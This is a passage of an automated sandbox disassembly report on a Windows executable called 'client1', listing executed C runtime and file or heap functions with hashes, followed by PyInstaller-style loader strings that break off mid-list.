                                                    • Instruction Fuzzy Hash: 83516D23E087818AFB20EF71D4503FDB7AAAB48B98FA44135DE2D57699DF78D4418720
                                                    Function 00007FF79F62B19C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction ID: 7bfa76644cef631d3ae45f44de4443e65a40bd1892020e5672e118848bef1773
                                                    • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction Fuzzy Hash: 73311321E097C345FA74BB7499513FDA29BEF91384FC44034E92E8B2D7DE6CA8058272
                                                    Function 00007FF79F634680 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1279662727-0
                                                    • Opcode ID: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                    • Instruction ID: 3c025c4dba6c9d4953071937d259e383a1883ee57a742f34534be38f6efcc3b2
                                                    • Opcode Fuzzy Hash: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                    • Instruction Fuzzy Hash: 24419523D187C183FB64AF3195503B9E265FB957A4F609334E66C03AD6DFACA5E08710
                                                    Function 00007FF79F62F39C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction ID: b1739a37f4992f6b746848c27ac7417057e0e1e55ffde008eb368e8f11f59d45
                                                    • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction Fuzzy Hash: D051EA61B193C245EA78AE3998006FAE19AAF44BB4F944734DD7D877CACF7CD4018722
                                                    Function 00007FF79F63B604 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B650
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B65A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction ID: 5f155c4b525449dfabc16d6bc686e936b05c9d6be56a2bcf0d31afdc90bb181e
                                                    • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction Fuzzy Hash: 3011B262B18BD181DA20AB35B4441A9E766AB85BF4F944331EA7D477E9CF7CD0118700
                                                    Function 00007FF79F63497C Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F634891), ref: 00007FF79F6349AF
                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F634891), ref: 00007FF79F6349C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Time$System$FileLocalSpecific
                                                    • String ID:
                                                    • API String ID: 1707611234-0
                                                    • Opcode ID: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                    • Instruction ID: c28e77baafd840d6b6a1853f21ae214b9dcd080fb990332cbe7c8f659b08ad54
                                                    • Opcode Fuzzy Hash: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                    • Instruction Fuzzy Hash: A511947260C78281EA74AF61A4511BAF766EB85771FA00235E6AD819D8EF6CD044DB20
                                                    Function 00007FF79F639E18 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                    • Instruction ID: 19b6404031add2747783e028df64db8afdda7d2ccebf9d65ef22a9341bfc207e
                                                    • Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                    • Instruction Fuzzy Hash: F5E08651F0878292FF347FB268850F5926B5F44B40BC44034C92D43252DE6CA8458730
                                                    Function 00007FF79F63A028 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A096
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A0A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction ID: 2210f0c6ec18eeecfef81bc4cfd7c9cdc769538a92b900b740c2422d0832fc66
                                                    • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction Fuzzy Hash: 4C21C211B0C7C341FA747770A4942F9969BAF447A8F844235D93E477C2CFAEA4459320
                                                    Function 00007FF79F63B37C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction ID: b5a193a13d7b48370e63cf277ad17c374611f16b92cad1aa5c5fcc9b271d7ff0
                                                    • Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction Fuzzy Hash: 8841BB3291878147EA34EB35E5401B9F76AEBD5750F900131E6AD476D5CF7CE402CB61
                                                    Function 00007FF79F627200 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock
                                                    • String ID:
                                                    • API String ID: 840049012-0
                                                    • Opcode ID: 9ca53ffba42af0d53283354c29b034d8f43de260ca55deaba02b2ea4ed6d239a
                                                    • Instruction ID: aaba48ed78273238833eb8c1e2c2563056a8dc6ee45a4c99caa644b75089b6cd
                                                    • Opcode Fuzzy Hash: 9ca53ffba42af0d53283354c29b034d8f43de260ca55deaba02b2ea4ed6d239a
                                                    • Instruction Fuzzy Hash: 0A218521B193D145EA31BA3269447FAE65ABF45BD4FC84430EE2D87786CF7DE1418211
                                                    Function 00007FF79F63AE0C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction ID: 63730c47883fcca5f8c442cb7ac1d0d8529cbffe6236c03dfad8cc0605df32aa
                                                    • Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction Fuzzy Hash: F0319222A187C145EB61BB3594013F8A66AEF40BA1F910135DA3D433D3CFFDA4419731
                                                    Function 00007FF79F6354C8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction ID: 15fc347ae576280363d2ac980cfb010aeb15619487631d56c09895f8abcbe662
                                                    • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction Fuzzy Hash: D0118422A1C7C241EE74BF61A4012F9E2AAEF85B80FD54031EA5C57797DFBDD8108721
                                                    Function 00007FF79F64575C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction ID: 44a8cb5cefe810d6dade91abf6b13ea437ccdd4a3b9926db605ca3c2ca9ebe9c
                                                    • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction Fuzzy Hash: AA218732A18BC187DB71BF28E4403B9B7A6EB84B94F944235E66D476D9DF3DD8008B14
                                                    Function 00007FF79F62F61C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction ID: 7d7071be6193a31a210b6f2e7c33f2c77c87ea4d077429a36c17e782bd0935d6
                                                    • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction Fuzzy Hash: 6D01A521B187C240EA24BB7699010E9E69EFB45FE0F888631DE7C57BD6CE7CD4019711
                                                    Function 00007FF79F63DD40 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF79F63A8B6,?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E), ref: 00007FF79F63DD95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction ID: 759ff3523cf500773aa47cd43d58c483f52b5daeafbc5732d7f1b4788e0dabf0
                                                    • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction Fuzzy Hash: 7CF04F54B1978A41FEB57A7255403F5A69E5F84B80F985630C92D86282DD9CF5508330
                                                    Function 00007FF79F63CACC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF79F62FE44,?,?,?,00007FF79F631356,?,?,?,?,?,00007FF79F632949), ref: 00007FF79F63CB0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction ID: aa05f9ea2760911250fe5ba90daae30ba66b8c2fb617f334bac014371a84969b
                                                    • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction Fuzzy Hash: 18F05E01B0D3C245FE347AB159402F591EA5F457A0F880630E93E862C2EEACB4408231

                                                    Non-executed Functions

                                                    Function 00007FF79F623DF0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for 